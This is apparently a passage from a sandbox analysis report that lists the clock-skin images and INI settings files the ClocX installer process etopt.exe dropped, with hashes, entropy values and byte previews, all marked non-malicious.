SHA-512:	B08EDA45A957706E47959DB5C429FDA68E9E1073FEF50251D0D344FA7A12C3142B9234F79FA079C95B0A4DE7818D9E78179EB5A6E49A8A6FDBE8D775CE6F3BF1
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..Y.IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8.....0..@...$....0KII1...0111...2qqq....../_..111.gee5......8...$%%.....899.uuu...(###.../.....q.....i. f....P....~add.....@....._........7..._.1....K..Hb........g.........J...i.#[...C...E....r\|@.d.H?...@.h......?...=..&..@\|.XJ.x..+gg.....C....!............<...:.\)..."''g...J..R.bNX..#.n...H....1@..\......+++.....C.}..w.U.9 >........MMM........8.........%.N..B........h......x..=N&A..Z.A...@j..."...:$.[A"B...Z.-.....a.L.czb.)....o..Nw....{.?...@...."...n....9...-....mllL.......,..C..a....A...............?~..l.1...p=....H...60.={.....dpssc...C..`4H.(..0.....v..<.,......ooop.n...X=....@.&.@#...3..........K___.X................D...C...3\.v...@..JKK.xxx..a...w.../fx..-...*.+W..^.............341@.......@...`"=....@.....s'#.......e.E<+.......#0...[..:V..p....A...dX.5.`40.......

C:\Program Files (x86)\ClocX\Presets\Kirchenuhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 142 x 143, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	27150
Entropy (8bit):	7.965413194830163
Encrypted:	false
SSDEEP:	384:WHpNa5lfTIYOR0MEvwGYHyEmHH497tvTDo8s7mTHX3cTLmkZR37B4jc23wXDpXGM:6OXgyE1hXod7mjcTLmQ74c2gXVXGwgns
MD5:	4AF2EC664E52978F64F505D6C2AB29B3
SHA1:	288C0683413F7E7AD06A868C4DA687C073D3A208
SHA-256:	D1D9C71B77F881609E96467DF3FADE83D734030101943064D201201EBE3EBBBB
SHA-512:	87CE065E304EA617FC2953212E74786D146315EBBCAE9456B353296613999EB82E24201AB52157C41A40AD1045FBAFD584002EBC3375265AD6DD5ADBFCFE8A3F
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............,......pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..i.IDATx.b...?.(......b...Q@... .. @.JJJ.0..`......}..?.......8..%%I...N!...%._K.#....'4.....%.8,A....(..p....ME.....,.%".......9........C....g.......=(........:.....0..$.....G.......p.p....p ...@..m......@r..N.`....RQ..G5.Ep.&.8...4N..p.DIJ..2.%..yI...py...eG..o}..y=......V.GKKILQ....A.J.....bV..H}...(.q..N.%...(.LX...\|...$TLSS.a...NZ....g..<...To...X...0.....41.K.P..N\.....N............R.. ....{>LJ$..b..%...G..$.g...+...;v.Rz.........>0.5%@%.(.9.8...\x0@..$.'...F:(...{....h......X...'..H.P....@.....E.D..I....9.....h.....ne....>\|.qw(Wk...-C$.A .n.h..4z..i5z.Lj.I....z.(;..y.*.SjH.) ...5....df.l. b..........3=...w.M.x..B........J3rN....... ...I..H.N6..H.5.^:?...t.....W.1....l....%.;.J.....c$)...DP..E4......T;?..u.X.pr..9..&.H."+`..JL.t.j.............$8A........P..w...'p...A.v.sH...w.8.r..@s8A. ..&0...V.X.c.q.I....J+..HK..G7..@........b?.%Hb.s`

C:\Program Files (x86)\ClocX\Presets\LongClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 122 x 104 x 24, resolution 2834 x 2834 px/m, cbSize 38328, bits offset 54
Category:	dropped
Size (bytes):	38328
Entropy (8bit):	6.400177731055891
Encrypted:	false
SSDEEP:	768:+SY8aR+Fh1mCcbLhN5PJsmU9exbK1UUWkOuRuaUivtgc:6V2zmCcbzPsmZhK5bRuitx
MD5:	224D809351EAC5981A93D5F78F325A14
SHA1:	A28AF5DF1908B2527E827931849D7891F6B2E508
SHA-256:	0A74FC0FFA8DFF0D8A080C3306CA98707BE271E02458879EA533CCA5BF43C3D8
SHA-512:	05741BB2F5C06A94D07106E86AFD5817F9380D6EC52D5570B41A659AC3BEDF1C1241FA67FFAF868E9B128532B334EFA682947CCB5DB412F0F23F8F6805E04C95
Malicious:	false
Reputation:	unknown
Preview:	BM........6...(...z...h..............................................................................................................................................................................................{{{xxxuuusssqqqpppnnnnnnnnnnnnpppqqqsssuuuxxx{{{..............................................................................................................................................................................................................................................................................................................xxxsssojgof_qc\scZye[}g[.j].k^.p_.p^.r_.s_.s_.r_.p^.p^.l[.j[~hZxeYscYoc[ne_ojgsssxxx.............................................................................................................................................................................................................................................................................}}}uuuqkgrf^ueX{fV.fT.q^.ra.sc.ue.vh.wk.ym.zk.}m.}n.xi.wh.\|m.wh.te.}n.wh.vg.uf.te.rc

C:\Program Files (x86)\ClocX\Presets\MClkhrHand.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 82 x 29, 8-bit/color RGB, interlaced
Category:	dropped
Size (bytes):	4342
Entropy (8bit):	7.941835201767031
Encrypted:	false
SSDEEP:	96:E6/uudQD0HcoVjwpVP8mJtJRIyi1vjnwMC1DyaebT1arybARHyAgWp:EYdd7VjwpBnnIyWvjnp4+a+T1arQAdyY
MD5:	1807D18C930D5B762C02DFA33439D019
SHA1:	7F542E821A9C6F7AF1A1B7120C4FFF8DC29E6FBD
SHA-256:	D951BB6D6D6FF4D0B15E3B9C803BB51C8EB10CE976517A7DC97F8636C7E24EEC
SHA-512:	D2D005DD7AB77D40C402883FDC3B49930844E1704028417ACD544DF6EC85290928D38AAA7964F5B7E083AA7F88BF71A65BF83B59F505BC5306F0663FED60E9D8
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...R..........G......tRNS.........;....pHYs..........&.?....tEXtComment.........IDATx..X.wTe...{..}..TB..@.VEd... . .@..E..b.e...BH !!dOH.....P.....i....s...........I%............"?Yg....F..D....`.s......j..~.br!D.A.).i......xF0..}.j...`....f.2 r.m.3;..NJL.P;c.3b.X<....dj...{...pa.4.g..'4.;lR. ....0..H.M......_....}<9S.k.T...F......$.B(.F.'.?S.... ...q..M.*(`h.&-c..@w.r../4K._.....~2..[.tU.CF..f.....6]6.1...jn../....}.}...)x..bN...I6..8..f.1...?.../v...1...O...FCQ.l.z.\..y...G.^.{"....d(.O........]q....W<....-.&..UNRD..8Qe.Loh..MP).L..AA>.........L........].U-Y.........A. v.M.,....y..b].Gs.r.....0....k."...xX(k..#....a.o,~tj.....^.+....-T.8@...N.]../i...Hg.z9.B...:?p.....~.;X3..FA.`....L..8....N....r..$2..y......2.V. .R}.......iu$..........."...ND.....kf..k....}...o<..J%R.H<....[V.!.KDf.V.%.q....A..Q.o.l......`c....ei...h..O..2.?.2.<K....tI.d.I4.nTL..)..H.Q2i.&....d7.+..q......Q.I..K/.......R..[7Q.....u.ggc(.n.bV-.y.......F..nf

C:\Program Files (x86)\ClocX\Presets\MClkminHand.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 99 x 29, 8-bit/color RGB, interlaced
Category:	dropped
Size (bytes):	4186
Entropy (8bit):	7.931723634103746
Encrypted:	false
SSDEEP:	96:6fLdlazsuvgUltX4xgm/HZe0lPHtSPwZLoc:6fHarvgUSgmA0N847
MD5:	7293D9082295616A46631E18065E8723
SHA1:	B67481A1D09E19D91FC4BAD975A2490545660570
SHA-256:	667A8F4C9F37BADFFBDD7708919BD6133A4F0C9B4599B3382A0B8478B17203AE
SHA-512:	8805516F149E8094E1A0BF0A406E9AFE643FF10D5A2119592FC1138296B4BD488C030AD83B0915489A0BB8DDA7C01B074B724AEA8CA665FE16122C72AC26DA26
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...c.........Fvu.....tRNS.........;....pHYs..........&.?....tEXtComment.........IDATx..Y.{.E........'.dX.(...(.]T......AH@.bX>.A...H 3..%.$3....I.~~?....t.'.\...x..S.&S]}..9.y..`=@.v.q.[?...O.._-.@... .V.....o..DfG&,.\|}cS....:68..p...x.A.b........d..}.e.}.}...F.......n.s.~=X.....iC"..a....y.i._\.oc...5.S.....%.0D&...\>..!.<0)...0..s..?7x6.(c...LRt............a...x]......#...2'..0..h?.\|...)"..]g.b...N.c9.^;...fF3.Q./..ju.......4..+2.2...r....p.e.X.p..3n.{....ug;.{.........2G..<Y `...._.2..{].~U......Y.l...AZ.. C..I7.~..........(. 0.&.".J........C."@..8.1N\C.,.G..7..7.=.nw/YV.F..jM....k^..Y.}.q.......o8...;....S=.........-4>&.h......p.f0.C....O.~../.X...;.#. G.=L@..&..%.G..w......'.(...Fe.H...n...}.^............W...\R....k.e.."=HC.d.P.A.v.x..7.U+./.K.w..R.+V.9.;Dvuh.9^.N.. M.a.(....m@...O.......cv(..h^..i..Y.z........v,a..v......?c.D<.Hdb...c}.:.]......b........4..Z4r..Hf..<.X.<A$.f....4....C.6A.a........^.U......W..4QWUCS....D

C:\Program Files (x86)\ClocX\Presets\Metalluhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15980
Entropy (8bit):	7.977328361379866
Encrypted:	false
SSDEEP:	384:/Uyi6ZuPdB7WF2ZylcQ25aSjZk9yeXi+FAvblFmLo0h6aGZRKdhVHeAnlF:/+6ZulBISIlyYKzmLD4aGDKrEAnj
MD5:	B7D40312C4D52BE2DCDF3B26E28C4225
SHA1:	694A2A386BC5AE7627EB643C16141C826862BA5A
SHA-256:	1E2467EA0BC4A8DC323A6B61F82165A6A52AF8D12245B7B7441FF7C8E4D40ECD
SHA-512:	E3629BAF278481FD9207AB2BE95D692E9A42ADB0E376FB6625653ADB98694934513F75910DCE21E42A7C364B3B69713BA7DC7D4418658D74520F3CA92C8B7B54
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs...:...:.d.W... .IDATx..YP.{z.g9I.r..d;..."5SS..R..\$.A......W6Eq9.(......s@..........( ...4....<.P{.L.j.f..O_<.........{.....G....pY..p....C.....8.p....C.....8.p....C.....8.p....C.....8.p....C.....8..}...~>1.(.....7<...7...3...=...9........'..mg....oZ.j_5..x..VS.:...-.].@.e...............>.....j...U..3.....g.....xT.E.F..^._QO^..n.>.F.=.d...^D....%.s..e..SH..Ci......../f..X\.\|.j...z..!.........<w.ex..et..1.h.2/.96O..<}3....].o.....C.V.M..m..ct...q.z.x.:..w<.o.......HHN.X.E"..%.d.i7...Z;.......XWW.fz~.yz.qj.....:F.w..?.4[&{....]ax....2C...M..92IK..M.c....7...!.:.y.9HC. /Z..n...\|.CUm...jH/. 9.6..n..m.q.W.sw........89=...].OZ........}......../[.&.Z.gs....[..tL..;......f...e.sV..9.z...o..A.%.j(.......e......+.>h..Q=%O^q..5./.p...J........<x.L..z.2.9..Hx...$.....n..>......w.>..VVV?...<.>0^..wl.M...{.B....s.YV...26.L..8/..)...;.O.]......xFA.s..._...Gu.=.....<zA.............<ml.yS..M]<~....m<y.N..n.7.P..O..8.#....S.1..

C:\Program Files (x86)\ClocX\Presets\MickeyClock.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	678
Entropy (8bit):	4.917267489832909
Encrypted:	false
SSDEEP:	12:a4EqmYLrrcR5pjpJrtOp0BP5oHy4yjQp2i0dO92HOFLlTYQBSwcz:BEQrm5b7Ouh5obykcix4OFFLi
MD5:	11E9EFE0037DA4F0FE989AB84830BA3D
SHA1:	CA50EC23FCCE716D006A4BF0BCB12D24B337154B
SHA-256:	D0DF0CE0E36DE4ECC1D6B132CCCBA792033D86CB8BB5C93C8BD9998BB705C56F
SHA-512:	2BE02B5476830EFB44F4FEC00FCF4095608BB3AA9C98FCAEEE2D90404B2FDC7ABE6742E21C9EDA56F63F57A66EBC0566391986A1E069DC5DD34532BBFE3BF97E
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x00ff00 ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x201010.;color of AM/PM indicator....HourPNG=MClkhrHand.hpng..HourPNGCenterDist=33....MinutePNG=MClkminHand.hpng..MinutePNGCenterDist=43........SecondColor=0x555555 ;color of second hand..SecondLength=100 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=2 ;width of second hand......CenterX=122 ;center point's X (default image_width / 2)..CenterY=123 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\MickeyClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 246 x 247, 8-bit/color RGB, interlaced
Category:	dropped
Size (bytes):	99813
Entropy (8bit):	7.9960328241893714
Encrypted:	true
SSDEEP:	1536:assTzTBUqQ3hK+9T/7NSOM0t5U7mn89Rby4MDS2NK3J9TvU68z/sa6xlcEyEPvTd:a3tUqKNSOMCDKbW+gU/xPvY1TRSa0
MD5:	268519BA3D99BB1A48FC6A044EB1984C
SHA1:	D5DBF25990D0D4B7254C31690569B76C7C6A95C0
SHA-256:	72645CB08A9D89EE34896521DFF7CDD0AC79536C72296949D393A483D37B2CDC
SHA-512:	D4D9AA8E54BF2A9D55E4C69A728F7D535ACAA576782E6A37F2E2198768F06A6A31536E04C488F3795E8C38AB8EC4003BE26094A1DE89BB76BAC382A91603A4CD
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............+......tRNS.........;....pHYs..........&.?....tEXtComment....... .IDATx....TU.>>$Q.8.s........0.y....b........k$...Tr........o.0..:.g.].....<..3.=..S.....i_k.....!...Y[w.Z....U...w6j....5....u]x..b.Kx..'k.CV.y./.z6...f.u<...b....4m..!l....\|..l.%F..[.8B.?...6.......YcG...q..#..F.M.......(....=t..\|.......&.d.V..A3.>..../X..u..j..u..^!.".).:Z7s..n.>c....[W..[.q.C.dY3H.....sdY......wn[w....^..H..^[S.7!..<...1l....]...........[.i.'...B>.?8..'.se#mY..'..l...-...+.8......q.l.X..b..G,....v..\|* ...l......J./..{..e9v......^..*D.<.......#.!d...A.....YK>.5...u1g.... .=<...n!..Y.Z.SV..k.b.M..pg....?)..BVz .W........!n..j..1_...p.......2q.NQ6.P)/...,W....^.>;.+...K..`!....l.^=.........:S.=c.4K...........&<.1....g...]k......%Fd,R.K..U.W..4.4. J....W.FlV.!1f..]G.A.l:\|D`@Or./H#.w..grK..\.X..-....yYY.V.R....PM.^.I1\|....^.2f...\..Z.9...$..)..%.....Kw.u.4mba.c.K..-....{.r...R.TgB.\.cA/=\....+.i.B..U.V.g...'...;..N.....

C:\Program Files (x86)\ClocX\Presets\MickeyMouse.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	680
Entropy (8bit):	4.892030328377304
Encrypted:	false
SSDEEP:	12:a4EqmYLrrcR5pjpJrtOp0KPvE0BHy5W2iWO92GbblTYQJbwcz:BEQrm5b7Ou0v/ONifpVJci
MD5:	A32B0A69A50AAAF0199500937B815EA7
SHA1:	F6E6D47D60107184DEEAB69A0B3BA0A7352063AB
SHA-256:	B39F51A64048FE26B41831D4DBB612965B967D9AA0F01D579038F67728508B8B
SHA-512:	FC35567C00F18BD886B42A4D0D447D99C7999696E22ABF657D929417B5EFB1F64B805F8144080473AF4E74577FAECCB9559F35808AB68F4D41CA0FB9C444A389
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x00ff00 ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x201010.;color of AM/PM indicator....HourPNG=MMousehrHand.hpng..HourPNGCenterDist=15....MinutePNG=MMouseminHand.hpng..MinutePNGCenterDist=21........SecondColor=0x444444 ;color of second hand..SecondLength=52 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand......CenterX=62 ;center point's X (default image_width / 2)..CenterY=61 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\MickeyMouse.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 123 x 124, 8-bit/color RGB, interlaced
Category:	dropped
Size (bytes):	28133
Entropy (8bit):	7.9887437039825295
Encrypted:	false
SSDEEP:	768:xXTnuvx75M3cPMaaI5SG58+a3/zRHC8nDawy6AXe68Dp:IvJ5kGeI5qPzRwhXe6E
MD5:	138B8FBF86D45154F336D82B65F64318
SHA1:	7EF479F3143CE1981D5B7586C770A5BEFE2F4C39
SHA-256:	43E465AE6CB6BD2CE7D58ED2082AC8598437B40B77B6ADE04B89C39EC1E82001
SHA-512:	DACA16170627397B20D7FEA20E52743FE9395FB8AF894EBB5AA6505C27979BDA1E6DD44A31695E436A165EE79CD2222F7483A24FE8AB9DF7AD8A3D4F9BB9F7F7
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...{...\|.......h.....tRNS.........;....pHYs..........&.?....tEXtComment....... .IDATx..}.xTU.w(v..Iv7.....i"...P@,`Gz.JG.. Ho.-...N..m{.........+....o...q.w.93..7...^99....k.6..._.....^..q.fQ.3....7..f.[/...\Z.G....>.0d.y...Y.5..:.[..)....x.S.K..8^.P)ht.....g.x.b .g.g].....(p.^..k..L"\|7...t.~O{....\.o..........y...&..${.7..N,..^....x..G.KDef].s#.F!P...3K......e...M..u.._.>=!L.R.jW/..o.N8S..E..'.O.....Ha....u.......b.t...u@..,.{0........&.."..d>.$.....k.QY@.U.'.+.L.Y.7..m...D.....s.p.....x..f!......wr.{-.&.....;f@....D~...k`V........V\|..g..x".Q...pM..~....4..F.M.n]8.....u6._5{.A... .RF.M......S.s[.p....V.......E....L.E..qi.ve....,.G..q.k........."riX*a.5,WZ.W.qi.].F1....z...^..........o..6}.......!.;.x.d.?...r6...... 8s.'X;........Z..Pym.O....y...,..D...k..9..D:h.SW.o...g....d...=fq.S..Gs.A....p..[..,J......^....5..j../.=.0...k..".......D.en..n.....?d.9.-.8}tB.=......En.D-.G...>..g....+...[...8.-.x..7m.[...{.nYxQ...k

C:\Program Files (x86)\ClocX\Presets\MilkClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 117 x 119 x 24, resolution 2834 x 2834 px/m, cbSize 41944, bits offset 54
Category:	dropped
Size (bytes):	41944
Entropy (8bit):	4.502988081517253
Encrypted:	false
SSDEEP:	384:48oCgzHI3a+orRHK546WiWERXIyX9mNobpDbWvwpOwxggScDYe9bahZ6biQP7l4d:nvarRqN9pkW2QP7+4j4tWldZU
MD5:	C429424DACB9E99C03E1C9AA0A43EDAC
SHA1:	8B46C8CEA93BB189D7BB658C2CB919C9BB5E73EC
SHA-256:	7759C1C207EACEA3C0D807F973AFEE0431763194CF965AF6D8A12B51E08269F0
SHA-512:	1EE9C13C2466AC1443E5CD0749B59071BDA105E61CC48558358EB7AC14700C7D0A3EB1804D11226C923CAF720813191F24EC4BE0E1494A07EFB230B0A4C15F8A
Malicious:	false
Reputation:	unknown
Preview:	BM.......6...(...u...w.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\MilkClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	21359
Entropy (8bit):	7.901413955608492
Encrypted:	false
SSDEEP:	384:5vztSCNV9xlvtlOzk3VB0/V+aWs9AGCexm2gRLfInmwzGCmTi5cUuYR00QQK1E50:TNV9vVlOu/0/7ZAGCexmdRLgmwzOikYm
MD5:	47F1370D7FF57B3FBB2279BEDB6B8AAB
SHA1:	4918369DB575B65C1FC5429E4BDFB56B1318EF71
SHA-256:	06A1292FF82C497E9238734AEF77C2F953371D5910A3AF93289F6C2820508428
SHA-512:	519CA59DB91E11C247E585511194D436401BE409EE65CBAC2C6B6EA9DA5AFCB80BA400B1CC98EBB24B4DFECECB679807BE2798B4CC2D3245B02C3B9667B75C65
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..R.IDATx.b...?.(... .X....^...J.....LLL.06.D.S...........;... .7ep.0.BQ@m...)....p...1m.B..>.......Zk4o....B...;....0gb....)[NxK.1.. (.r...T...1Z.U...%.5e.. .CQ[.a`....V.`...1.x..../.^.[..\|.dz(.R..:c.<...b....G..C....Pb.....K.5S/....foG.:FG.\.,.B..R..{a ........a.. .F...2..x..x.)c.V.U..;D?.@...]F...{.C...L)....u....D..3#.U..2...<...P..8iP..........m.wf}dn.\kM..7....X.7......}...$..+E8.........2.....R...0.6.T.n...?z. XZ."\......P .......@..40..r......d5P.Xx.........kc.1......,...VWk...k.\|`P.._..$j...qI..Dy(T.L.s.<.4..<.g.....].@p...{l..~._.0[E)..0t...).......z..5...........`......... ...0.sN....9..ZT..k.=.."\|.M..vS........jZ....O..o.f.+..s.1..I.S....2.,.9..t.\|r. ".E)..U..%....0.D..hK.7.z....\o..\t.P.".....#t..$,.g....Zr...N.X.{.....Vuc...z.;. ........,[`.^&Q...I]..H..O[x.d.iXxF..S......Q*...<...B........a\|Ln..O.u.dk.i...........O.

C:\Program Files (x86)\ClocX\Presets\Naranja.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	25596
Entropy (8bit):	7.895086709174528
Encrypted:	false
SSDEEP:	384:izRtQkbn+VtynIsPHlUGcCv5OcTfDs/YipSwz+H0lco7iHTA6ve+O4AypF21w:uLQkbn5Pn5OcavTzZlc1H06mn4LIw
MD5:	6E26841542A025BB86B2BEA057B57704
SHA1:	CE1A326FB113AC7B0F5A5850F6EFAAF35637C6ED
SHA-256:	FEB312B60BCF8CB4A74F95639CCA0FC8C0AD71567EBD3A980D868671E5A0C105
SHA-512:	C0F4E46D6952DBA10CCCF6337C701AA75EEE8AB4A48A30C66190561AB6ED040EEC282CD79B20B4833101C3B702EA715243092B47DB80707015A8E880A7C8E33D
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..crIDATx.b...?.(..C.....h.......h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!....e4....."L....@."..102..i) ..bQ ..b~ ..bN f.j.....+.....@..._..3...O..# .....n..7.FC.8..@...q.&s.}`"..2u.X..5.X..xT..-..... ...W....N..8....@..&`....L..@.......#....Jl..i;......w...........O.M."..j..v..g...p'LF.R..R.-^....G..! >Xw.......4".00.... .Lc.@..3.a&VFF...{.`M..b{..n..&..#-....[v+..A..Z..4...{..y...60tkY.\..+..p..0.\.a.I.LqK:X2=......7...B.@fKd......b.$/ I..d.0..d..F..W.a.w=..........E...u.ij...N+.:.8......_.O..JE.....)..}..&ZP. .. .. .3.bi.2..-..;.......<.?..f....&ZA.fp..&j.f0Mr...wP".../........./.3\|z.................?......y#...H..&...9~..h.&``...&.P 3.....-Jz.r........OL.AXA.AX^.A....d.X.9....)H?8..*....n...7...>>.....m....0.......0............'.}@...[.L.o.c<...K.....L..@f..;.J..@...d.V.......

C:\Program Files (x86)\ClocX\Presets\Negro.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1406
Entropy (8bit):	4.794122875050788
Encrypted:	false
SSDEEP:	24:BEGrGXz5lrUBRyTOLX01rfPkp+dGm8JiX33NPeibQ0Wd9iBxLuQI:B1qFlQmiEdGmxtPBQJTiBxLvI
MD5:	8F3B521E705B5627F46E7B0013FF6C32
SHA1:	022116186DBDE488C76A3576313B6A85E8D867E2
SHA-256:	BC8D35BFB7F76801FC490B94CCC9F7EE56ED46FFBAEC4C6A2863360A11905685
SHA-512:	CF042E18EC79DEF94ADEFAE65AD05F7E74F980BDF94D84DBF57CA07C03266CB5F2513578DF1F4BB86233A309A52988C872C7A75994C004AF2C1958586E276537
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFFFF0 ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0xFFFFFF ;color of hour hand..HourLength=39 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xFFFFFF ;color of minute hand..MinuteLength=59 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=63 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width / 2).. ;

C:\Program Files (x86)\ClocX\Presets\Negro.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15904
Entropy (8bit):	7.882124962892923
Encrypted:	false
SSDEEP:	384:+WRaK+pYK+RSwp359dz+GWW0DlS3dSX45sEHI44bkOvVYD:+saKO+Qwb9d/0DstSI5sA9D
MD5:	B2ED7E8FD0CCF0E6B45B3C47CEFA3742
SHA1:	0BC335E49A4E210A677181D3867CA1342C269B10
SHA-256:	AEA2E2C6F689C1DB7CAEC63BB7D6A1863F4A564560B0C90D145C76B9F3A2D8E3
SHA-512:	21FC75602C9C4E31D4A5BBBACFAE3A99F7E6CE8BD8BF73548142198F2BF32A0E5B3F131D19CD0C6755602A53C472E7347AC311A4F36E83EE1FF73E02BC7978B5
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..=.IDATx.b...?.(..C.....h.......h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!....O.(..P.E...FTD.....B.6Z.<..R..2p.).&...GD......=:..Q.D..i..q....+f8XL0Xpy....... ....8.-(s.....k.......:4..A.(+. .6.%.?.....hA..&....[@\|.....g`b.3.+.. .F.0"..."..k.........+#%VF:9.?R...........@..........@.....L.l.j...m.........:.#....S@\|..O..#...k..!@.....L......m...$<....O... .......H.K...=.. ....B...(9.6{.m.:)... $...........c.<......3....%..Rz...<.p..Z.c...Rb.&p.!..c..........Z+J).9#.....X... .te{.8n.pa..{.....g...a.......,..&^=b..D.... ''.....AXAA..h...@f..6##i.cP...)....8.{........?..w....'61."..4...57.f......@.6.C..%.G....+...`..%FP.)##.......*UA. u..U...e.P......G..n...._..a%4.w....@........@...C...@....@,.+..JNP..%R}}}0...d...AI....T....../^D....f.;;;..?..W.^...PM.s..y.J..]..q...p.

C:\Program Files (x86)\ClocX\Presets\Neon.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1464
Entropy (8bit):	4.842480420404331
Encrypted:	false
SSDEEP:	24:BEQrGXz5lrUNdaKy4jTORXFBA1rfLkppSPGm8eGiEw33NPeibQ0Wd9iBxLuQI:BzqFlCdf1YFuGHSPGmjtPBQJTiBxLvI
MD5:	F9DA34467004F63FA227A92A987A53A5
SHA1:	910197CEC498DC6B075C50952441666D12940D5D
SHA-256:	2A4CF56FCF8001F8D6DBAA7229CC8BB52A638058746F76F8D170BAE6FC3FAAB4
SHA-512:	B4F3B866672B429D548A10EBBB56B02A0C740A22E6407BA43C437EA7ADFEE0A649F82D7E8EA195D4B1CAA37954EA65FDE9338C89F7681660C2BAF70AC5F030A2
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Arial..AMPMFontSize=12 ;size of AM/PM font....DisableDate=0..DateColor=000000..DateFont=Arial..DateFontSize=12....HourColor=0x800000 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=4 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x800000 ;color of minute hand..MinuteLength=48 ;length of minute hand..MinuteLap=6 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x434379 ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=8 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;CenterX=60

C:\Program Files (x86)\ClocX\Presets\Neon.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	43626
Entropy (8bit):	7.986276133657454
Encrypted:	false
SSDEEP:	768:DuF0MfMQQxIK70B7sJozsmZcWbgQK5d3/6cwivjm2A6SB9Cw0ZHYec5rLQoGd6dt:qSMfMQQKKIUoYG9bgQs1yc9V69rvecpR
MD5:	87304CFA94B7A6C97C5FAD0E1D03AAEB
